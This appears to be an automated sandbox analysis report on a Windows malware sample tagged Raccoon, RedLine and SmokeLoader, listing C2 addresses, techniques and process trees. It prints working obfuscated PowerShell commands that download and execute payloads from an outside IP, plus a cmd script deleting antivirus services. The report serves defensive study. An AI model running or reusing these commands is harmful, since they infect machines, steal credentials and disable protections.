raccoon | f24a559e79ba3121c7e0fed4ac995da056fe6a0dac71b2360f9e340b97117d05

Resubmissions

26-08-2021 21:12

210826-flswvxb8js 10

13-08-2021 07:22

210813-9241gpvrbs 10

Analysis

max time kernel
151s
max time network
147s
platform
windows10_x64
resource
win10v20210408
submitted
13-08-2021 07:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

06a029882deabf229f62728afe3baf4f.exe
Size

319KB
MD5

06a029882deabf229f62728afe3baf4f
SHA1

33a5953fbcce8761af1e68df9c9f4ad153c4a536
SHA256

f24a559e79ba3121c7e0fed4ac995da056fe6a0dac71b2360f9e340b97117d05
SHA512

a81631eef6163f437e5bdf83156d26856653411dc6b9becc5580a83b9a4123faec5855d625beec15b1f71c3155624187f776f56b4f58e5f87e9f39bd8b61ba88

Score

10^/10

raccoon redline smokeloader stealthworker 471c70de3b4f9e4d493e418d1f60a90659057de0 cd8dc1031358b1aec55cc6bc447df1018b068607 backdoor botnet discovery evasion infostealer persistence spyware stealer suricata themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://193.56.146.55/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes

url4cnc
https://telete.in/p1rosto100xx

rc4.plain

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 5 IoCs

resource	yara_rule
behavioral2/memory/1488-194-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/1488-195-0x000000000044003F-mapping.dmp	family_raccoon
behavioral2/memory/1488-212-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/2224-222-0x0000000000400000-0x0000000002CA9000-memory.dmp	family_raccoon
behavioral2/memory/2224-226-0x0000000004830000-0x00000000048C1000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
StealthWorker
StealthWorker is golang-based brute force malware.
botnet stealthworker

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3600 created 2224	3600	WerFault.exe	106

suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Blocklisted process makes network request 1 IoCs

flow	pid	Process
205	3860	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 9 IoCs

pid	Process
688	42F5.exe
1332	4577.exe
2684	470E.exe
3880	4E53.exe
856	Runtimebroker.exe
1488	470E.exe
2224	A5F9.exe
204	wgsbiwi
3548	wgsbiwi

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4E53.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4E53.exe

Deletes itself 1 IoCs

pid	Process
2428	Process not Found

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk	Runtimebroker.exe

Loads dropped DLL 1 IoCs

pid	Process
1488	470E.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000200000001ab52-133.dat	themida
behavioral2/files/0x000200000001ab52-134.dat	themida
behavioral2/memory/3880-137-0x0000000001280000-0x0000000001281000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4E53.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3880	4E53.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 648 set thread context of 3584	648	06a029882deabf229f62728afe3baf4f.exe	75
PID 2684 set thread context of 1488	2684	470E.exe	103
PID 204 set thread context of 3548	204	wgsbiwi	127

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 18 IoCs

pid	pid_target	Process	procid_target
3616	688	WerFault.exe	79
3748	688	WerFault.exe	79
2156	688	WerFault.exe	79
4052	688	WerFault.exe	79
3240	688	WerFault.exe	79
1216	688	WerFault.exe	79
1144	856	WerFault.exe	91
3376	856	WerFault.exe	91
412	856	WerFault.exe	91
1944	856	WerFault.exe	91
1184	856	WerFault.exe	91
1328	856	WerFault.exe	91
4028	2224	WerFault.exe	106
4064	1488	WerFault.exe	103
3888	2224	WerFault.exe	106
1524	2224	WerFault.exe	106
1416	2224	WerFault.exe	106
3600	2224	WerFault.exe	106

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	06a029882deabf229f62728afe3baf4f.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	06a029882deabf229f62728afe3baf4f.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	06a029882deabf229f62728afe3baf4f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wgsbiwi
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wgsbiwi
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wgsbiwi

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3584	06a029882deabf229f62728afe3baf4f.exe
3584	06a029882deabf229f62728afe3baf4f.exe
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2428	Process not Found

Suspicious behavior: MapViewOfSection 19 IoCs

pid	Process
3584	06a029882deabf229f62728afe3baf4f.exe
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found
2428	Process not Found

Suspicious use of AdjustPrivilegeToken 59 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeRestorePrivilege	3616	WerFault.exe
Token: SeBackupPrivilege	3616	WerFault.exe
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeDebugPrivilege	3616	WerFault.exe
Token: SeDebugPrivilege	3748	WerFault.exe
Token: SeDebugPrivilege	2156	WerFault.exe
Token: SeDebugPrivilege	4052	WerFault.exe
Token: SeDebugPrivilege	3240	WerFault.exe
Token: SeDebugPrivilege	3880	4E53.exe
Token: SeDebugPrivilege	1216	WerFault.exe
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeDebugPrivilege	1144	WerFault.exe
Token: SeDebugPrivilege	3376	WerFault.exe
Token: SeDebugPrivilege	412	WerFault.exe
Token: SeDebugPrivilege	1944	WerFault.exe
Token: SeDebugPrivilege	1184	WerFault.exe
Token: SeDebugPrivilege	1328	WerFault.exe
Token: SeDebugPrivilege	3728	powershell.exe
Token: SeDebugPrivilege	2684	470E.exe
Token: SeDebugPrivilege	3860	powershell.exe
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeDebugPrivilege	4028	WerFault.exe
Token: SeDebugPrivilege	4064	WerFault.exe
Token: SeDebugPrivilege	3888	WerFault.exe
Token: SeDebugPrivilege	1524	WerFault.exe
Token: SeDebugPrivilege	1416	WerFault.exe
Token: SeDebugPrivilege	3600	WerFault.exe
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found
Token: SeShutdownPrivilege	2428	Process not Found
Token: SeCreatePagefilePrivilege	2428	Process not Found

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
2428	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 648 wrote to memory of 3584	648	06a029882deabf229f62728afe3baf4f.exe	75
PID 648 wrote to memory of 3584	648	06a029882deabf229f62728afe3baf4f.exe	75
PID 648 wrote to memory of 3584	648	06a029882deabf229f62728afe3baf4f.exe	75
PID 648 wrote to memory of 3584	648	06a029882deabf229f62728afe3baf4f.exe	75
PID 648 wrote to memory of 3584	648	06a029882deabf229f62728afe3baf4f.exe	75
PID 648 wrote to memory of 3584	648	06a029882deabf229f62728afe3baf4f.exe	75
PID 2428 wrote to memory of 688	2428	Process not Found	79
PID 2428 wrote to memory of 688	2428	Process not Found	79
PID 2428 wrote to memory of 688	2428	Process not Found	79
PID 2428 wrote to memory of 1332	2428	Process not Found	80
PID 2428 wrote to memory of 1332	2428	Process not Found	80
PID 2428 wrote to memory of 1332	2428	Process not Found	80
PID 2428 wrote to memory of 2684	2428	Process not Found	81
PID 2428 wrote to memory of 2684	2428	Process not Found	81
PID 2428 wrote to memory of 2684	2428	Process not Found	81
PID 2428 wrote to memory of 3880	2428	Process not Found	84
PID 2428 wrote to memory of 3880	2428	Process not Found	84
PID 2428 wrote to memory of 3880	2428	Process not Found	84
PID 688 wrote to memory of 856	688	42F5.exe	91
PID 688 wrote to memory of 856	688	42F5.exe	91
PID 688 wrote to memory of 856	688	42F5.exe	91
PID 1332 wrote to memory of 1788	1332	4577.exe	92
PID 1332 wrote to memory of 1788	1332	4577.exe	92
PID 1332 wrote to memory of 1788	1332	4577.exe	92
PID 856 wrote to memory of 3728	856	Runtimebroker.exe	100
PID 856 wrote to memory of 3728	856	Runtimebroker.exe	100
PID 856 wrote to memory of 3728	856	Runtimebroker.exe	100
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 856 wrote to memory of 3860	856	Runtimebroker.exe	104
PID 856 wrote to memory of 3860	856	Runtimebroker.exe	104
PID 856 wrote to memory of 3860	856	Runtimebroker.exe	104
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2428 wrote to memory of 2224	2428	Process not Found	106
PID 2428 wrote to memory of 2224	2428	Process not Found	106
PID 2428 wrote to memory of 2224	2428	Process not Found	106
PID 2428 wrote to memory of 3240	2428	Process not Found	107
PID 2428 wrote to memory of 3240	2428	Process not Found	107
PID 2428 wrote to memory of 3240	2428	Process not Found	107
PID 2428 wrote to memory of 3240	2428	Process not Found	107
PID 2428 wrote to memory of 3812	2428	Process not Found	108
PID 2428 wrote to memory of 3812	2428	Process not Found	108
PID 2428 wrote to memory of 3812	2428	Process not Found	108
PID 2428 wrote to memory of 2120	2428	Process not Found	112
PID 2428 wrote to memory of 2120	2428	Process not Found	112
PID 2428 wrote to memory of 2120	2428	Process not Found	112
PID 2428 wrote to memory of 2120	2428	Process not Found	112
PID 2428 wrote to memory of 3896	2428	Process not Found	116
PID 2428 wrote to memory of 3896	2428	Process not Found	116
PID 2428 wrote to memory of 3896	2428	Process not Found	116
PID 3860 wrote to memory of 2080	3860	powershell.exe	117
PID 3860 wrote to memory of 2080	3860	powershell.exe	117
PID 3860 wrote to memory of 2080	3860	powershell.exe	117
PID 2428 wrote to memory of 4068	2428	Process not Found	119
PID 2428 wrote to memory of 4068	2428	Process not Found	119
PID 2428 wrote to memory of 4068	2428	Process not Found	119
PID 2428 wrote to memory of 4068	2428	Process not Found	119
PID 2428 wrote to memory of 2372	2428	Process not Found	120

C:\Users\Admin\AppData\Local\Temp\06a029882deabf229f62728afe3baf4f.exe
"C:\Users\Admin\AppData\Local\Temp\06a029882deabf229f62728afe3baf4f.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:648
- C:\Users\Admin\AppData\Local\Temp\06a029882deabf229f62728afe3baf4f.exe
  "C:\Users\Admin\AppData\Local\Temp\06a029882deabf229f62728afe3baf4f.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3584

C:\Users\Admin\AppData\Local\Temp\42F5.exe
C:\Users\Admin\AppData\Local\Temp\42F5.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:688
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 788
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:3616
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 804
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:3748
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 788
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:2156
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 916
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:4052
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 804
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:3240
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 976
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:1216
- C:\ProgramData\Runtimebroker.exe
  "C:\ProgramData\Runtimebroker.exe"
  2⤵
  - Executes dropped EXE
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:856
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 736
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:1144
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 788
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:3376
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 760
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:412
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 780
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 996
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:1184
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 1028
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:1328
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
    3⤵
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:3728
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3860
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2080
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete 